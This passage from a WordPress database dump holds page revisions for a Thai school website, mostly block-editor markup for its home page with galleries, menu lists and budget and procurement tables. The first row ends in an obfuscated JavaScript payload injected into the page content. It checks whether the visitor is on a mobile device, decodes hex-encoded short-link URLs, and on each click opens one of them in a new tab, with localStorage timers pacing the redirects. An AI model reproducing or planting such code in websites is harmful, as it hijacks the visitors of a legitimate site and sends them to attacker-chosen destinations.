)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-01 11:47:51','2024-08-01 04:47:51','',14,'http://pakhaeng.ssk.in.th/?p=360',0,'revision','',0),
(361,1,'2024-08-01 13:33:32','2024-08-01 06:33:32','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder\\u0026p=328\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}]} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"author\":[],\"offset\":\"0\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#2d27a1\",\"headingHoverBgColor\":\"#abb8c3\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#0693e3\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#8ed1fc\",\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=337\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 